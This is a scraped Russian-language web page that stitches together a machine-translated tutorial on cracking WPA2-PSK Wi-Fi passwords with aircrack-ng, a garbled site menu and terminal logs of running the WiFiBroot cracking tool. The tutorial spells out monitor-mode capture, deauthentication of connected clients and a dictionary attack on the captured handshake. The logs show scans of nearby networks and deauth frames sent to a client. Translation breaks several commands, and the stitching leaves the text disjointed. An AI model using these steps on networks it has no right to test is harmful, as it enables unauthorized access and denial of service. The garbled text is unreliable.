Источник: Quora.com

Надеюсь, этот метод сработал для вас, ребята! Хорошего дня.

Если вам понравился этот пост, не забудьте поделиться им со своими друзьями.

Если у вас есть вопросы, прокомментируйте свои сомнения в поле для комментариев.

Еще читают:

Получите более интересную статью вроде этой
в свой почтовый ящик

Подпишитесь на наш список рассылки и получайте ежедневно новые статьи и обновления на свой почтовый ящик.

Взлом паролей WPA2-PSK с помощью Aircrack-Ng «Null Byte :: WonderHowTo

С возвращением, мои хакеры-новички.

Когда Wi-Fi был впервые разработан в конце 1990-х годов, была создана технология Wired Equivalent Privacy, обеспечивающая конфиденциальность беспроводной связи. WEP, как стало известно, оказался очень несовершенным и легко взломанным. Вы можете прочитать об этом в моем руководстве для начинающих по взлому Wi-Fi .

В качестве замены в большинстве точек беспроводного доступа теперь используется Wi-Fi Protected Access II с предварительно выданным ключом для обеспечения безопасности беспроводной сети, известным как WPA2-PSK.WPA2 использует более надежный алгоритм шифрования, AES, который очень трудно взломать, но не невозможно. В моем руководстве по взлому Wi-Fi для начинающих также есть дополнительная информация об этом.

Слабым местом системы WPA2-PSK является то, что зашифрованный пароль используется совместно с так называемым четырехсторонним рукопожатием. Когда клиент аутентифицируется в точке доступа (AP), клиент и AP проходят 4-этапный процесс для аутентификации пользователя в AP. Если мы сможем захватить пароль в это время, мы сможем попытаться взломать его.

В этом руководстве из серии «Взлом Wi-Fi» мы рассмотрим использование aircrack-ng и словарную атаку на зашифрованный пароль после его захвата в 4-стороннем рукопожатии. Если вы ищете более быстрый способ, я предлагаю вам также ознакомиться с моей статьей о взломе паролей WPA2-PSK с помощью coWPAtty .

Шаг 1. Переведите адаптер Wi-Fi в режим монитора с помощью Airmon-Ng

Давайте начнем с перевода нашего беспроводного адаптера в режим монитора.

Нужен беспроводной сетевой адаптер? Купите лучший беспроводной сетевой адаптер для взлома Wi-Fi в 2017 году

Чтобы это работало, нам понадобится совместимый беспроводной сетевой адаптер. Ознакомьтесь с нашим списком беспроводных сетевых адаптеров, совместимых с Kali Linux и Backtrack за 2017 год, по ссылке выше, или вы можете взять наш самый популярный адаптер для начинающих здесь.

Это похоже на перевод проводного адаптера в неразборчивый режим.Это позволяет нам видеть весь беспроводной трафик, который проходит мимо нас в воздухе. Откройте терминал и введите:

Обратите внимание, что airmon-ng переименовал ваш адаптер wlan0 в mon0 .

Шаг 2. Захват трафика с помощью Airodump-Ng

Теперь, когда наш беспроводной адаптер находится в режиме мониторинга, у нас есть возможность видеть весь беспроводной трафик, который проходит в воздухе. Мы можем получить этот трафик, просто используя команду airodump-ng .

Эта команда захватывает весь трафик, который может видеть ваш беспроводной адаптер, и отображает важную информацию о нем, включая BSSID (MAC-адрес точки доступа), мощность, количество кадров маяка, количество кадров данных, канал, скорость, шифрование (если есть), и, наконец, ESSID (то, что большинство из нас называет SSID).Давайте сделаем это, набрав:

Обратите внимание, что все видимые точки доступа перечислены в верхней части экрана, а клиенты - в нижней части экрана.

Шаг 3. Сосредоточение Airodump-Ng на одной точке доступа на одном канале

Наш следующий шаг - сосредоточить наши усилия на одной точке доступа, на одном канале и собирать с него важные данные. Для этого нам нужны BSSID и канал. Откройте другой терминал и введите:

• airodump-ng --bssid 08: 86: 30: 74: 22: 76 -c 6 --write WPAcrack mon0

• 08: 86: 30: 74 : 22: 76 - это BSSID AP
• -c 6 - канал, на котором работает AP
• WPAcrack - это файл, в который вы хотите записать
• mon0 - это беспроводной адаптер для мониторинга *

Как вы можете видеть на скриншоте выше, сейчас мы сосредоточены на захвате данных с одной точки доступа с ESSID Belkin276 на канале 6.Belkin276, вероятно, является SSID по умолчанию, которые являются основными целями для взлома беспроводных сетей, поскольку пользователи, которые оставляют ESSID по умолчанию, обычно не тратят много усилий на защиту своей точки доступа.

Шаг 4: Aireplay-Ng Deauth

Чтобы перехватить зашифрованный пароль, нам нужно, чтобы клиент аутентифицировался по AP. Если они уже аутентифицированы, мы можем деаутентифицировать их (отключить), и их система автоматически повторно аутентифицируется, в результате чего мы можем получить их зашифрованный пароль в процессе.Откройте другой терминал и введите:

• aireplay-ng --deauth 100 -a 08: 86: 30: 74: 22: 76 mon0

• 100 - это количество фреймов деаутентификации, которые вы хотите отправить
• 08: 86: 30: 74: 22: 76 - это BSSID точки доступа
• mon0 - это беспроводной адаптер для мониторинга

Шаг 5: Захват рукопожатия

На предыдущем шаге мы отключили пользователя от его собственной точки доступа, и теперь, когда он повторно аутентифицируется, airodump-ng попытается получить его пароль в новом четырехстороннем рукопожатии.Вернемся к нашему терминалу airodump-ng и проверим, добились ли мы успеха.

Обратите внимание, что в верхней строке справа, airodump-ng говорит «рукопожатие WPA». Таким образом он сообщает нам, что нам удалось получить зашифрованный пароль! Это первый шаг к успеху!

Шаг 6: Давайте взломаем этот пароль!

Теперь, когда у нас есть зашифрованный пароль в нашем файле WPAcrack , мы можем запустить этот файл против aircrack-ng, используя файл паролей по нашему выбору.Помните, что этот тип атаки хорош ровно настолько, насколько хорош ваш файл паролей. Я буду использовать список паролей по умолчанию, включенный в aircrack-ng на BackTrack с именем darkcOde .

Теперь мы попытаемся взломать пароль, открыв другой терминал и набрав:

• aircrack-ng WPAcrack-01.cap -w / pentest / passwords / wordlists / darkc0de

• WPAcrack-01 .cap - это имя файла, который мы записали в команде airodump-ng.
• / pentest / passwords / wordlist / darkc0de - это абсолютный путь к вашему файлу паролей

Сколько времени это займет?

Этот процесс может быть относительно медленным и утомительным.В зависимости от длины вашего списка паролей вы можете ждать от нескольких минут до нескольких дней. На моем двухъядерном 2,8-гигабайтном процессоре Intel он способен проверять чуть более 500 паролей в секунду. Это примерно 1,8 миллиона паролей в час. Ваши результаты будут отличаться.

Когда пароль будет найден, он появится на вашем экране. Помните, файл паролей имеет решающее значение. Сначала попробуйте использовать файл паролей по умолчанию, а если это не удастся, перейдите к большему и более полному файлу паролей, например к одному из этих.

Следите за обновлениями, чтобы получить больше руководств по взлому беспроводных сетей

Продолжайте возвращаться, поскольку я обещаю более продвинутые методы взлома беспроводных сетей в будущих руководствах. Если вы еще не видели других руководств по взлому Wi-Fi, ознакомьтесь с ними здесь . В частности, на , взломавшем WEP с помощью aircrack-ng и , взломавшем пароли WPA2-PSK с помощью coWPAtty .

Если вы ищете дешевую и удобную платформу для начала работы с aircrack, ознакомьтесь с нашей сборкой Kali Linux Raspberry Pi с использованием Raspberry Pi за 35 долларов.

Приступите к взлому сегодня: настройте безголовую платформу для взлома Raspberry Pi под управлением Kali Linux

И, как всегда, если у вас есть вопросы, задавайте их в комментариях ниже. Если это что-то не связанное, попробуйте спросить на форуме Null Byte.

Хотите начать зарабатывать деньги хакером в белой шляпе? Начните свою профессиональную хакерскую карьеру с помощью нашего пакета обучения Premium Ethical Hacking Certification Bundle 2020 из нового магазина Null Byte и получите более 60 часов обучения от профессионалов в области этического взлома.

Купить сейчас (90% скидка)>

Как взломать Wi-Fi (беспроводную) сеть

• Home

• Testing

  • • Back
    • Agile Testing
    • BugZilla
    • Cucumber
    • Database Testing
    • Тестирование ETL
    • Назад
    • JUnit
    • LoadRunner
    • Ручное тестирование
    • Мобильное тестирование
    • Mantis
    • Почтальон
    • QTP
    • Назад
    • Центр качества (ALM)
    • Центр качества (ALM)
    • Управление тестированием
    • TestLink

• SAP

  • • Назад
    • ABAP
    • APO
    • Начинающий
    • Basis
    • BODS
    • BI
    • BPC
    • CO
    • Назад
    • CRM
    • Crystal Reports
    • FICO
    • 000 HRM
    • 000 HRM
    • MM Pay
    • Назад
    • PI / PO
    • PP
    • SD
    • SAPUI5
    • Безопасность
    • Менеджер решений
    • Successfactors
    • SAP Tutorials

• Web
• Web
• AngularJS
• ASP.Net
• C
• C #
• C ++
• CodeIgniter
• СУБД
• JavaScript

• Назад
• Java
• JSP
• Kotlin
• Linux
• Linux
• Kotlin
• Linux
js
• Perl

• Назад
• PHP
• PL / SQL
• PostgreSQL
• Python
• ReactJS
• Ruby & Rails
• Scala
• SQL
000
• SQL
000 0003 SQL 000 0003 SQL 000
• UML
• VB.Net
• VBScript
• Веб-службы
• WPF

 root @ kali: / home / iicybersecurity / Downloads / WiFiBroot # iwconfig eth0 нет беспроводных расширений. Нет никаких беспроводных расширений.  wlan0mon  Режим IEEE 802.11: частота монитора: 2,462 ГГц Tx-Power = 20 дБм Ограничение на короткие попытки: 7 RTS th: off Фрагмент th: off Управление питанием: выключено 

 root @ kali: / home / iicybersecurity / Downloads #  git clone https: // github.com / hash4liZer / WiFiBroot.git  Клонирование в «WiFiBroot»… удаленный: Перебор объектов: 3, готово. удаленный: Подсчет объектов: 100% (3/3), готово. remote: Сжатие объектов: 100% (3/3), готово. удаленный: всего 276 (дельта 0), повторно используется 1 (дельта 0), повторно используется пакет 273 Прием объектов: 100% (276/276), 504.20 Кбайт | 347.00 Кбайт / с, готово. Разрешение дельт: 100% (166/166), готово. root @ kali: / home / iicybersecurity / Загрузки #  cd WiFiBroot /  root @ kali: / home / iicybersecurity / Downloads / WiFiBroot #  ls  диктует тянуть рукопожатие.py screen.py wifibroot.py exceptions.py LICENSE README.md utils wireless 

 root @ Kali: / home / iicybersecurity / Downloads / WiFiBroot #  python wifibroot.py  Отслеживание (последний вызов последний): Файл "wifibroot.py", строка 19, в из беспроводного импортного переключателя Файл "/ home / iicybersecurity / Downloads / WiFiBroot / wireless /  init  .py", строка 3, в из wireless.cracker импорт PSK Файл "/ home / iicybersecurity / Downloads / WiFiBroot / wireless / cracker.ру ", строка 6, в из pbkdf2 импортировать PBKDF2 ImportError: нет модуля с именем pbkdf2 

 root @ kali: / home / iicybersecurity / Downloads / WiFiBroot #  python wifibroot.py -h  

  _ ___ ___ ___ ___ ___ \\ _ / \ * \ ___ * \ __ \\ __ \ / \ / \\ ___ \ \\ \\\ \\ __ \\ / \) \\) \\ \ \ __ \\ __ \\\ \\ __ \\ \\ __ / \ ___ / \ __ \ v1.0. Кодируется @ hash4liZer.  

 Синтаксис: $ python wifibroot.py [--mode [режимы]] [--options] $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d / путь / к / списку -w pmkid.txt Режимы: # Описание Значение 01 Захват 4-стороннего рукопожатия и взлом кода MIC 1 02 Захват и взлом PMKID (атака PMKID) 2 03 Выполните взлом манаула при наличии типы захвата. См. --List-types 3 04 Деаутентификация.Отключить две станции и заглушить движение. 4 Используйте -h, --help после -m, --mode, чтобы получить справку по режимам. 

 root @ kali: / home / iicybersecurity / Downloads / WiFiBroot #  python wifibroot.py --mode 1 --type handshake -i wlan0mon --verbose -d / home / iicybersecurity / Downloads / WiFiBroot / dicts / list.] Сканирование! Для остановки нажмите [CTRL + C]. НЕТ ESSID PWR ENC CIPHER AUTH CH BSSID VENDOR CL ---- ------------ ----- ----- -------- ------ ---- ------ ----------- -------- ---- 1 HATHWAY -38 WPA2 CCMP PSK 10 8C: E1: 17: 8D: 5C: E4 zte 2 2 ZTE-ae1e0e -40 WPA2 CCMP PSK 1 88: 5D: FB: AE: 1E: 0E zte 0 3 MTNL_HOTSPOT -78 WPA2 TKIP PSK 11 0C: D2: B5: 2C: 55: 5D Binatone 1 4 Neon`Sunny -87 WPA2 TKIP PSK 1 34: E3: 80: 41: F8: 68 Genexis 0 5 TP-LINK_D9D6 -87 WPA2 CCMP PSK 1 98: DE: D0: A7: D9: D6 TP-LINK 0  

 [] Изменение канала на 11 [SuccessFul]  

  [?] Клиенты AP [1] Дальнейшее сканирование? [Y / n]   n     [] Интервал времени [15] -> Подразумевается, что пропуск ч / б кадров равен 15 

 [^] 32-> 8CBEBE314C0F (Xiaomi)> <0CD2B52C555D (Binatone) [Деаутентификация] [^] 32-> 8CBEBE314C0F (Xiaomi)> <0CD2B52C555D (Binatone) [Деаутентификация] [^] 32-> 8CBEBE314C0F (Xiaomi)> <0CD2B52C555D (Binatone) [Деаутентификация]